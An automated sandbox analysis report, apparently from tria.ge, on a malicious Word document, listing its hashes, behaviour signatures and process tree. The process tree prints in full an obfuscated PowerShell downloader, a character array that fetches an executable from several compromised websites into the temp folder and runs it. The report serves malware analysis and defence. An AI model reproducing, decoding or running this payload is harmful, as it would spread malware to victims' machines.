Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
19s -
max time network
18s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
26/11/2020, 09:32
General
-
Target
cc0a345e8f33b676e64bb8624a12b7831880bb9d27fc7e30923f239307976410.doc
-
Size
337KB
-
MD5
cf9c2ff0e5ca4d7c91d05d8bc8e6a710
-
SHA1
586d42846bd67b726606c4e7325bcc0a3339bec3
-
SHA256
cc0a345e8f33b676e64bb8624a12b7831880bb9d27fc7e30923f239307976410
-
SHA512
fd517573dc26a6bc698f44dbc9af57d894363a566b053a81ca0e5030bc2039d1bdf94da548afcebf0a831dc80d7294395a936a2f919dda3bff9376f0208014e4
Score
10/10
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blacklisted process makes network request 3 IoCs
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 8 IoCs
-
Suspicious use of WriteProcessMemory 2 IoCs
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\cc0a345e8f33b676e64bb8624a12b7831880bb9d27fc7e30923f239307976410.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\PowERsHell.exePowERsHell " iEX ( \" $(SEt-ItEm 'vaRIablE:oFS' '' ) \" + [STRiNg][ChAr[]] ( 36 ,83 , 82 ,106, 61 ,110 ,101, 119 , 45 , 111, 98 ,106 , 101 ,99,116, 32 ,78 , 101, 116, 46, 87 ,101, 98 ,67 , 108,105 , 101,110 ,116 ,59 , 36,85 ,106 , 85,61 , 39, 104,116,116, 112, 58, 47 ,47 , 105 , 122,101, 114, 111 ,110 , 101 , 46, 99,111 , 109, 47 ,119,111 , 114 ,100,112,114 ,101, 115 , 115 , 47, 119, 112,45, 99, 111, 110 , 116 , 101, 110 ,116 ,47 ,104 ,47 ,64 ,104,116 , 116, 112, 58 ,47,47,112, 117,114,119,111 , 115 , 97, 114 , 105 ,116 , 101,107 , 110 ,105, 107, 46, 99 ,111,109 , 47 ,83 ,47, 64, 104 ,116 ,116, 112 ,58 , 47 ,47, 117 , 110, 101 , 97 ,108,46, 101 ,110,100,101, 118,109 , 111 , 100,101, 46 ,99 ,111 , 109 ,47 , 119,112,45 , 99,111, 110 ,116 , 101 , 110,116, 47 ,117,112 , 108,111,97,100, 115 ,47,109 ,105, 104 ,72, 67,71 , 77, 67,47,64 , 104,116 ,116,112 , 58 ,47, 47 ,119 ,119 , 119 ,46, 99 ,111 ,100 , 105,102 , 101 , 116 ,46,99 ,111, 109 ,47, 78 , 84, 98, 87 ,102,56 ,49,47 , 64,104 , 116, 116,112, 58 , 47 , 47 ,119 , 119,119, 46 , 100 , 101,103 , 105 , 111 ,114,103 , 105 , 111,103,105,111 , 105 , 101, 108, 108,105 ,46,99,111,109, 47 , 75,122, 111 , 47 ,39 ,46 , 83, 112,108, 105 , 116,40 , 39,64,39 ,41 , 59 , 36 , 107 ,122 , 122, 32, 61 ,32 ,39,50, 48 ,55 , 39 ,59, 36, 76 , 122 , 84 ,61 , 36 , 101, 110, 118, 58,116 , 101,109 , 112 , 43 ,39 ,92 ,39, 43, 36, 107,122 ,122,43 , 39 , 46,101 ,120 ,101 ,39 , 59, 102,111,114 ,101, 97, 99 , 104 ,40, 36,102 ,105 ,105 , 32 ,105 ,110, 32, 36,85,106,85, 41 , 123 ,116,114 , 121, 123,36 , 83 , 82, 106 ,46 , 68 ,111 ,119,110,108 , 111,97,100 ,70, 105, 108 , 101 , 40,36 ,102, 105,105 ,44, 32 , 36 ,76, 122,84 ,41 , 59 ,83 ,116 ,97 ,114 , 116, 45 , 80,114, 111, 99, 101, 115,115, 32,36,76 ,122 , 84,59, 98,114 ,101, 97 , 107 , 59 ,125, 99,97, 116 ,99 ,104 , 123 ,125, 125) +\"$( sET 'oFS' ' ' ) \" )"2⤵
- Process spawned unexpected child process
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6.2MB
-
Filesize
20KB
-
Filesize
20KB
-
Filesize
68KB
-
Filesize
20KB
-
Filesize
9.9MB
-
Filesize
4KB
-
Filesize
4KB